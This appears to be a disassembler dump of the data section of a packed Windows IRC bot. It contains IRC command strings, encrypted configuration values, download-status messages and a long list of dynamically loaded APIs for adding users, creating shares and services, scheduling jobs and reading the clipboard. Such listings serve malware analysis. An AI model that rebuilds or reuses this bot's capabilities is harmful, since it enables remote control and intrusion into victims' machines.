aUp db 'up',0 ; DATA XREF: sub_401B8B:loc_401CC8�o
align 4
aSc db 'sc',0 ; DATA XREF: sub_401B8B:loc_401C8E�o
align 10h
aSErrorS_ db '%s Error: %s.',0 ; DATA XREF: UPX0:004035E4�o
align 10h
a_2d_2d db ' %.2d:%.2d',0 ; DATA XREF: UPX0:004034FD�o
align 10h
aDS db ' %d%s',0 ; DATA XREF: UPX0:004034D3�o
align 4
aHours db ' hours',0 ; DATA XREF: UPX0:004034C6�o
align 10h
aHour db ' hour',0 ; DATA XREF: UPX0:004034BF�o
align 4
aSCreatedSPidD db '%s Created: "%s", PID: <%d>',0 ; DATA XREF: UPX0:00403441�o
dd 2 dup(0)
aSFailedSErrorD db '%s Failed: "%s", error: <%d>',0 ; DATA XREF: UPX0:00403408�o
align 10h
aSErrorD db '%s error: <%d>',0 ; DATA XREF: UPX0:00403368�o
; UPX0:00403607�o
align 10h
dd 0
aSDl_1fkbToS@_1 db '%s dl: %.1fKB to: %s @ %.1fKB/sec.',0 ; DATA XREF: UPX0:004032FA�o
align 10h
aSCgS_ db '%s Cg: %s.',0 ; DATA XREF: UPX0:004031B6�o
align 10h
aXx8k78xp db 'Xx8K78xP',0 ; DATA XREF: UPX0:00403910�o
; UPX0:loc_4039B4�o
align 4
aUCantStopUs db 'u-cant-stop-us',0 ; DATA XREF: sub_401B8B+320�o
byte_40FB8B db 21h ; DATA XREF: sub_401A85+22�r
; sub_401A85+71�r ...
aWindirSystem32 db '%windir%\system32',0 ; DATA XREF: sub_4037AE+70�o
align 10h
dword_40FBA0 dd 57885F47h, 29B2CC18h, 0F8h ; sub_4037AE+7B�o ...
dword_40FBAC dd 15h dword_40FBB0 dd 77944573h, 3DB88D0Bh, 1D7ACEh ; sub_4037AE+36�o ...
dword_40FBBC dd 40944573h, 71A49514h, 0C5117CCEh, 0ADFC2442h, 0C46F99CDh
; DATA XREF: sub_402EA5+50�o
; sub_40829C+51�o
dd 0ADC8h
dword_40FBD4 dd 40944573h, 71A49514h, 0C5117CCEh, 0ADFC2442h, 0C46F99CDh
; DATA XREF: sub_402EA5+68�o
; sub_40829C:loc_40831A�o
dd 0ADC8h
dword_40FBEC dd 47945557h, 25A48316h, 7EF8h ; sub_406B46+1D1�o
dword_40FBF8 dd 64D00D0Eh, 51h, 64D00D0Eh, 51h, 64D00D0Eh, 51h
; DATA XREF: UPX0:off_40FC10�o
; UPX0:0040FC14�o
off_40FC10 dd offset dword_40FBF8 ; DATA XREF: sub_402EA5+9F�o
; sub_406B46+174�o
dd offset dword_40FBF8+8
dd offset dword_40FBF8+10h
align 10h
dword_40FC20 dd 45D44B43h dd 3FB69009h, 840C6DFEh, 0C87641h, 3Ch dup(0)
dword_40FD20 dd 4382184Ch, 0B08C4Fh, 2 dup(0) ; UPX0:00403B1E�o
dword_40FD30 dd 22Bh align 8
dword_40FD38 dd 9D4B07h ; sub_406EA7+6D�r ...
dd 3 dup(0)
db 2 dup(0)
dword_40FD4A dd 509C1F4Ch ; UPX0:004071E1�r ...
dw 2
dd 2 dup(0)
db 2 dup(0)
word_40FD5A dw 0 ; DATA XREF: UPX0:004071CB�o
dd 2 dup(0)
db 2 dup(0)
word_40FD66 dw 0 ; DATA XREF: sub_40731E+28�o
dd 2 dup(0)
db 2 dup(0)
word_40FD72 dw 4B07h ; DATA XREF: sub_401B8B+7EF�o
; sub_40B179+9B�o ...
dd 8099Dh, 3 dup(0)
dd 99D4B07h, 8, 2 dup(0)
db 2 dup(0)
dword_40FD96 dd 17911E07h ; UPX0:0040722A�r
align 4
dd 3 dup(0)
dword_40FDA8 dd 80000002h ; UPX0:00403954�r ...
dword_40FDAC dd 70BC6377h, 1485A32Ch, 0C33350C1h, 0BBC0764Dh, 0FB7289D0h
; DATA XREF: sub_402EA5+1A8�o
; sub_4037AE+BD�o ...
dd 29E589F1h, 82AC3AA9h, 0E9524DA4h, 0B2D1AD84h, 0A496CE87h
dd 5FA1A003h, 0EE399468h, 903D9798h, 98E9CC42h, 0AC789FD4h
dd 8ADEh, 2Fh dup(0)
db 3 dup(0)
byte_40FEAB db 4Bh ; DATA XREF: sub_402EA5+1C1�o
; sub_4037AE+B8�o ...
dd 1A508942h, 35B290h, 0C1h dup(0)
dword_4101B8 dd 2343003h, 6E69616Dh, 203h ; sub_401B8B+CAD�o ...
dword_4101C4 dd 2333003h, 65726874h, 3736461h, 2, 2343003h, 3637269h
; DATA XREF: sub_401B8B+ACD�o
; sub_401B8B+AE5�o ...
dd 2
dword_4101E0 dd 2343003h, 2036C64h, 0 ; sub_401B8B+9E0�o ...
dword_4101EC dd 2343003h, 2037075h, 0 ; sub_401B8B+34A�o ...
off_4101F8 dd offset byte_413980 ; DATA XREF: sub_40670F+6�r
; sub_40670F+12�r ...
off_4101FC dd offset byte_413980 ; DATA XREF: sub_40670F+2F�r
; sub_40670F:loc_40675A�r ...
dword_410200 dd 1 ; UPX0:00403B72�r
dword_410204 dd 3 ; sub_406B46+16B�r ...
dd 55h dup(0)
aEnabledMicroso db 'Enabled:Microsoft Enabled',0 ; DATA XREF: sub_4037AE:loc_403892�o
align 4
dd 0
aSS db '%s\%s',0 ; DATA XREF: sub_4037AE+8E�o
; sub_408F96+34�o
align 4
aSystemCurren_0 db 'SYSTEM\CurrentControlSet\Control',0 ; DATA XREF: UPX0:00403AC3�o
align 4
dd 0
aWaittokillserv db 'WaitToKillServiceTimeout',0 ; DATA XREF: UPX0:00403ABE�o
align 4
dd 0
a7000 db '7000',0 ; DATA XREF: UPX0:00403AB9�o
align 4
dword_4103D4 dd 3430033Ah, 726F7702h, 6469726Dh, 66742E65h, 2037074h
; DATA XREF: UPX0:00403A7C�o
dd 3Ah, 0
dword_4103F0 dd 3430033Ah, 62737502h, 3A0203h, 0aPingTimeout?DD db 'Ping Timeout? (%d-%d)%d/%d',0 ; DATA XREF: UPX0:00403D10�o
align 10h
aSLoginListComp db '%s Login List complete.',0 ; DATA XREF: UPX0:00404166�o
dd 0
aIEmpty db '<%i> <Empty>',0 ; DATA XREF: UPX0:00404143�o
align 4
aISS@S db '<%i> %s!%s@%s',0 ; DATA XREF: UPX0:00404131�o
align 4
aSLoginList db '%s Login List:',0 ; DATA XREF: UPX0:0040410C�o
align 10h
aUserS0S db 'USER %s * 0 :%s',0Dh,0Ah,0 ; DATA XREF: sub_4042A3+129�o
align 8
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_4042A3+116�o
; sub_4052FB+F�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_4042A3+103�o
align 10h
aLeaving db 'Leaving',0 ; DATA XREF: sub_40443D+9�o
dd 0
aQuit db 'QUIT',0Dh,0Ah,0 ; DATA XREF: sub_40447B:loc_4044C6�o
align 4
aQuitS db 'QUIT %s',0Dh,0Ah,0 ; DATA XREF: sub_40447B+39�o
align 10h
asc_4104C0 db 0Dh,0Ah,0 ; DATA XREF: sub_40457E+F�o
align 4
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_4045CE+1BD�o
align 10h
aPing db 'PING',0 ; DATA XREF: sub_4045CE+19E�o
align 4
aNick db 'NICK',0 ; DATA XREF: sub_4045CE:loc_404705�o
align 10h
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_4045CE:loc_4046DC�o
; sub_4073C0+1C�o
dd 0
aNotice db 'NOTICE',0 ; DATA XREF: sub_4045CE+E6�o
align 4
aQuit_0 db 'QUIT',0 ; DATA XREF: sub_4045CE:loc_4046A1�o
align 4
aPart db 'PART',0 ; DATA XREF: sub_4045CE+91�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_4045CE:loc_404648�o
align 4
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40487C+3B�o
align 10h
aPrivmsgSS db 'PRIVMSG %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_4048F0+3B�o
; UPX0:004049CC�o
align 4
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_404A11+F�o
align 10h
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_404A3B+13�o
align 10h
aPartS db 'PART %s',0Dh,0Ah,0 ; DATA XREF: UPX0:00404A79�o
align 4
aKickSS db 'KICK %s %s',0Dh,0Ah,0 ; DATA XREF: UPX0:00404AA7�o
align 4
aS_3 db '%s',0Dh,0Ah,0 ; DATA XREF: UPX0:00404AD2�o
align 4
aKickSSS db 'KICK %s %s :%s',0Dh,0Ah,0 ; DATA XREF: UPX0:00404B04�o
align 4
aModeSSS db 'MODE %s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_404B21+35�o
dd 0
aModeSS db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_404B21+1A�o
align 4
aError db 'Error',0 ; DATA XREF: sub_404C66+56�o
align 4
aS db '%s-',0 ; DATA XREF: sub_404CEA+34�o
aWin db 'WIN-',0 ; DATA XREF: sub_404D74:loc_404E3C�o
align 10h
a2k3 db '2K3-',0 ; DATA XREF: sub_404D74+C1�o
align 4
aXp db 'XP-',0 ; DATA XREF: sub_404D74+B3�o
a2k db '2K-',0 ; DATA XREF: sub_404D74+A3�o
aMe db 'ME-',0 ; DATA XREF: sub_404D74+8B�o
a98 db '98-',0 ; DATA XREF: sub_404D74+7B�o
aNt db 'NT-',0 ; DATA XREF: sub_404D74+6B�o
a95 db '95-',0 ; DATA XREF: sub_404D74+58�o
aSpI db 'SP%i-',0 ; DATA XREF: sub_404EB9+63�o
align 4
asc_4105E8: ; DATA XREF: sub_404F82:loc_40510B�o
unicode 0, <]>,0
aI db '%i',0 ; DATA XREF: sub_404F82+16D�o
align 10h
asc_4105F0: ; DATA XREF: sub_404F82+116�o
; sub_405186+95�o ...
unicode 0, <|>,0
aWin_0 db 'WIN',0 ; DATA XREF: sub_404F82:loc_40506B�o
a2k3_0 db '2K3',0 ; DATA XREF: sub_404F82+E0�o
aXp_0 db 'XP',0 ; DATA XREF: sub_404F82+D0�o
align 10h
a2k_0 db '2K',0 ; DATA XREF: sub_404F82+BE�o
align 4
aMe_0 db 'ME',0 ; DATA XREF: sub_404F82+A4�o
align 4
a98_0 db '98',0 ; DATA XREF: sub_404F82+92�o
align 4
aNt_0 db 'NT',0 ; DATA XREF: sub_404F82+80�o
align 10h
a95_0 db '95',0 ; DATA XREF: sub_404F82+70�o
align 4
a_2i64u db '%.2I64u',0 ; DATA XREF: sub_405186+FA�o
align 10h
aD: ; DATA XREF: sub_405186+E0�o
unicode 0, <D>,0
aA: ; DATA XREF: sub_405186+B4�o
unicode 0, <A>,0
aAim_csignonwnd db 'AIM_CSignOnWnd',0 ; DATA XREF: sub_405186+A5�o
align 4
dd 0
aM: ; DATA XREF: sub_405186+87�o
unicode 0, <M>,0
aMsnhiddenwindo db 'MSNHiddenWindowClass',0 ; DATA XREF: sub_405186+75�o
align 4
dd 0
asc_41065C: ; DATA XREF: sub_405186+60�o
unicode 0, <[>,0
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: UPX0:00405376�o
; sub_40AB4C+39�o
align 10h
aPathremovefile db 'PathRemoveFileSpecA',0 ; DATA XREF: sub_4053A3+F36�o
align 8
aShlwapi_dll db 'shlwapi.dll',0 ; DATA XREF: sub_4053A3:loc_4062CE�o
align 8
aGetprocessmemo db 'GetProcessMemoryInfo',0 ; DATA XREF: sub_4053A3+EDA�o
align 10h
dd 0
aEnumprocesses db 'EnumProcesses',0 ; DATA XREF: sub_4053A3+ECD�o
align 4
aEnumprocessmod db 'EnumProcessModules',0 ; DATA XREF: sub_4053A3+EC0�o
align 4
dd 0
aGetmodulebasen db 'GetModuleBaseNameA',0 ; DATA XREF: sub_4053A3+EB3�o
align 10h
dd 0
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_4053A3+EAB�o
align 10h
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_4053A3:loc_406241�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_4053A3+E49�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_4053A3+E3C�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_4053A3+E2F�o
align 10h
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_4053A3+E22�o
align 10h
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_4053A3+E15�o
align 10h
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_4053A3+E0D�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_4053A3:loc_4061A3�o
align 10h
dd 0
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_4053A3+DCB�o
align 8
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_4053A3+DC3�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_4053A3:loc_406159�o
align 8
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_4053A3+D71�o
align 10h
dd 0
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_4053A3+D64�o
align 10h
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_4053A3+D57�o
align 8
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_4053A3+D4F�o
align 10h
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_4053A3:loc_4060E5�o
dd 0
aGetudptable db 'GetUdpTable',0 ; DATA XREF: sub_4053A3+CF5�o
dd 0
aGettcptable db 'GetTcpTable',0 ; DATA XREF: sub_4053A3+CE8�o
dd 0
aGetiftable db 'GetIfTable',0 ; DATA XREF: sub_4053A3+CDB�o
align 4
dd 0
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_4053A3+CCE�o
align 10h
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_4053A3+CC6�o
align 10h
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_4053A3:loc_40605C�o
align 10h
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_4053A3+C84�o
align 10h
dd 0
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_4053A3+C7C�o
align 10h
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_4053A3:loc_406012�o
align 10h
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_4053A3+BF2�o
align 4
dd 0
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_4053A3+BE5�o
align 10h
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_4053A3+BD8�o
align 10h
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_4053A3+BCB�o
align 10h
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_4053A3+BBE�o
align 10h
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_4053A3+BB1�o
align 10h
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_4053A3+BA4�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_4053A3+B97�o
align 4
dd 0
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_4053A3+B8A�o
align 4
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_4053A3+B7D�o
dd 0
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_4053A3+B75�o
dd 0
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_4053A3:loc_405F07�o
align 4
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_4053A3+B27�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_4053A3+B1A�o
align 10h
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_4053A3+B12�o
align 10h
dd 0
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_4053A3:loc_405EA8�o
align 10h
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_4053A3+AD8�o
align 10h
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_4053A3+A66�o
align 8
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_4053A3+A59�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_4053A3+A4C�o
align 10h
dd 0
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_4053A3+A3F�o
align 4
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_4053A3+A32�o
align 4
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_4053A3+A25�o
align 4
aFtpputfilea db 'FtpPutFileA',0 ; DATA XREF: sub_4053A3+A18�o
dd 0
aFtpgetfilea db 'FtpGetFileA',0 ; DATA XREF: sub_4053A3+A0B�o
dd 0
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_4053A3+9FE�o
align 10h
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_4053A3+9F1�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_4053A3+9E4�o
dd 2 dup(0)
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_4053A3+9DC�o
align 8
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_4053A3:loc_405D6E�o
align 8
aShutdown db 'shutdown',0 ; DATA XREF: sub_4053A3+88E�o
align 4
aClosesocket db 'closesocket',0 ; DATA XREF: sub_4053A3+881�o
dd 0
aGetpeername db 'getpeername',0 ; DATA XREF: sub_4053A3+874�o
dd 0
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_4053A3+867�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_4053A3+85A�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_4053A3+84D�o
dd 0
aGetsockname db 'getsockname',0 ; DATA XREF: sub_4053A3+840�o
dd 0
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_4053A3+833�o
align 10h
dd 0
aAccept db 'accept',0 ; DATA XREF: sub_4053A3+826�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_4053A3+819�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_4053A3+80C�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_4053A3+804�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_4053A3+7F2�o
align 10h
aRecv db 'recv',0 ; DATA XREF: sub_4053A3+7E5�o
align 4
aSendto db 'sendto',0 ; DATA XREF: sub_4053A3+7D8�o
align 10h
aSend db 'send',0 ; DATA XREF: sub_4053A3+7CB�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_4053A3+7BE�o
align 10h
aNtohs db 'ntohs',0 ; DATA XREF: sub_4053A3+7B1�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_4053A3+7A4�o
align 10h
aHtons db 'htons',0 ; DATA XREF: sub_4053A3+797�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_4053A3+78A�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_4053A3+77D�o
align 10h
aConnect db 'connect',0 ; DATA XREF: sub_4053A3+770�o
dd 0
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_4053A3+763�o
dd 0
aSocket db 'socket',0 ; DATA XREF: sub_4053A3+756�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_4053A3+749�o
align 10h
dd 0
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_4053A3+73C�o
align 8
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_4053A3+72F�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_4053A3+722�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_4053A3+715�o
align 8
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_4053A3+708�o
align 8
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_4053A3+700�o
align 8
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_4053A3+6EF�o
align 8
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_4053A3+67C�o
align 4
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_4053A3+66F�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_4053A3+662�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_4053A3+655�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_4053A3+648�o
align 10h
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_4053A3+63B�o
align 10h
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_4053A3+62E�o
align 8
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_4053A3+621�o
align 4
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_4053A3+619�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_4053A3:loc_4059AB�o
align 4
aSetservicestat db 'SetServiceStatus',0 ; DATA XREF: sub_4053A3+56B�o
align 4
aRegisterserv_0 db 'RegisterServiceCtrlHandlerA',0 ; DATA XREF: sub_4053A3+55E�o
dd 2 dup(0)
aUnlockserviced db 'UnlockServiceDatabase',0 ; DATA XREF: sub_4053A3+551�o
align 8
aChangeservicec db 'ChangeServiceConfig2A',0 ; DATA XREF: sub_4053A3+544�o
align 10h
dd 0
aQueryservicelo db 'QueryServiceLockStatusA',0 ; DATA XREF: sub_4053A3+537�o
align 10h
aLockservicedat db 'LockServiceDatabase',0 ; DATA XREF: sub_4053A3+52A�o
align 8
aImpersonatelog db 'ImpersonateLoggedOnUser',0 ; DATA XREF: sub_4053A3+51D�o
dd 0
aStartservicect db 'StartServiceCtrlDispatcherA',0 ; DATA XREF: sub_4053A3+510�o
dd 2 dup(0)
aCreateservicea db 'CreateServiceA',0 ; DATA XREF: sub_4053A3+503�o
align 4
dd 0
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_4053A3+4F6�o
align 4
dd 0
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_4053A3+4E9�o
dd 0
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_4053A3+4DC�o
align 4
dd 0
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_4053A3+4CF�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_4053A3+4C2�o
align 10h
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_4053A3+4B5�o
align 10h
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_4053A3+4A8�o
align 10h
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_4053A3:loc_405843�o
align 10h
dd 0
aLsantstatustow db 'LsaNtStatusToWinError',0 ; DATA XREF: sub_4053A3+448�o
align 10h
aLsaclose db 'LsaClose',0 ; DATA XREF: sub_4053A3+43B�o
align 4
aLsafreememory db 'LsaFreeMemory',0 ; DATA XREF: sub_4053A3+42E�o
align 4
aLsaremoveaccou db 'LsaRemoveAccountRights',0 ; DATA XREF: sub_4053A3+421�o
align 8
aLsaaddaccountr db 'LsaAddAccountRights',0 ; DATA XREF: sub_4053A3+414�o
align 10h
aLsalookupnames db 'LsaLookupNames2',0 ; DATA XREF: sub_4053A3+407�o
dd 0
aLsaenumerateac db 'LsaEnumerateAccountsWithUserRight',0 ; DATA XREF: sub_4053A3+3FA�o
align 4
dd 0
aLsaopenpolicy db 'LsaOpenPolicy',0 ; DATA XREF: sub_4053A3:loc_405795�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_4053A3+3BA�o
align 8
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_4053A3+3AD�o
align 10h
dd 0
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_4053A3+3A0�o
align 4
aOpenthreadtoke db 'OpenThreadToken',0 ; DATA XREF: sub_4053A3:loc_40573B�o
dd 0
aRegqueryinfoke db 'RegQueryInfoKeyA',0 ; DATA XREF: sub_4053A3+338�o
align 10h
aRegenumvaluea db 'RegEnumValueA',0 ; DATA XREF: sub_4053A3+32B�o
align 10h
aRegenumkeyexa db 'RegEnumKeyExA',0 ; DATA XREF: sub_4053A3+31E�o
align 10h
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_4053A3+311�o
align 10h
aRegdeletekeya db 'RegDeleteKeyA',0 ; DATA XREF: sub_4053A3+304�o
align 10h
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_4053A3+2F7�o
dd 0
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_4053A3+2EA�o
align 4
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_4053A3+2DD�o
align 4
dd 0
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_4053A3+2D0�o
align 10h
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_4053A3+2C8�o
align 10h
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_4053A3:loc_405656�o
align 10h
aGetclassnamea db 'GetClassNameA',0 ; DATA XREF: sub_4053A3+25E�o
align 10h
aIswindowvisibl db 'IsWindowVisible',0 ; DATA XREF: sub_4053A3+251�o
dd 0
aShowwindow db 'ShowWindow',0 ; DATA XREF: sub_4053A3+244�o
align 10h
dd 0
aGetwindowthrea db 'GetWindowThreadProcessId',0 ; DATA XREF: sub_4053A3+237�o
align 10h
dd 0
aGetwindowinfo db 'GetWindowInfo',0 ; DATA XREF: sub_4053A3+22A�o
align 4
aEnumwindows db 'EnumWindows',0 ; DATA XREF: sub_4053A3:loc_4055C5�o
dd 0
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_4053A3+1C2�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_4053A3+1B5�o
align 8
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_4053A3+1A8�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_4053A3+19B�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_4053A3+18E�o
align 4
aIswindow db 'IsWindow',0 ; DATA XREF: sub_4053A3+181�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_4053A3+174�o
align 8
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_4053A3+167�o
align 4
aClosewindow db 'CloseWindow',0 ; DATA XREF: sub_4053A3+15F�o
align 8
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_4053A3:loc_4054ED�o
align 8
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_4053A3:loc_4054C0�o
align 10h
dd 0
aGetcomputernam db 'GetComputerNameA',0 ; DATA XREF: sub_4053A3+AD�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_4053A3+A0�o
align 8
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_4053A3+93�o
dd 0
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_4053A3+86�o
dd 0
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_4053A3+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_4053A3+6C�o
align 10h
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_4053A3+5F�o
align 8
aModule32first db 'Module32First',0 ; DATA XREF: sub_4053A3+52�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_4053A3+45�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_4053A3+38�o
align 4
dd 0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_4053A3+2B�o
align 4
dd 0
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_4053A3+23�o
align 4
a0: ; DATA XREF: sub_406776+ED�o
; sub_40A87B+87�o ...
unicode 0, <0>,0
a90 db '90',0 ; DATA XREF: sub_406776:loc_406852�o
align 4
a168 db '168',0 ; DATA XREF: sub_406776+C9�o
a192 db '192',0 ; DATA XREF: sub_406776:loc_40682E�o
a16 db '16',0 ; DATA XREF: sub_406776+A5�o
align 10h
a172 db '172',0 ; DATA XREF: sub_406776+94�o
a10 db '10',0 ; DATA XREF: sub_406776+83�o
align 4
a_: ; DATA XREF: sub_406776+3F�o
; UPX0:00408771�o ...
unicode 0, <.>,0
aAbcdefghijklmn db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: UPX0:004068D5�o
align 4
dd 0
dword_41137C dd 4E495001h, 47hdword_411384 dd 52455601h, 4E4F4953h, 1dword_411390 dd 25217325h, 73254073h, 0dword_41139C dd 7325h ; sub_409D61+3DE�o
aTopic db 'topic',0 ; DATA XREF: sub_406F72+122�o
align 4
asc_4113A8: ; DATA XREF: sub_406F72+9E�o
unicode 0, <)>,0
aDec db '$dec(',0 ; DATA XREF: sub_406F72+90�o
align 4
asc_4113B4: ; DATA XREF: sub_407273+16�o
; sub_408E28+B�o
unicode 0, < >,0
a433 db '433',0 ; DATA XREF: sub_4073C0+AB�o
a422 db '422',0 ; DATA XREF: sub_4073C0+9A�o
a376 db '376',0 ; DATA XREF: sub_4073C0+8D�o
a005 db '005',0 ; DATA XREF: sub_4073C0+82�o
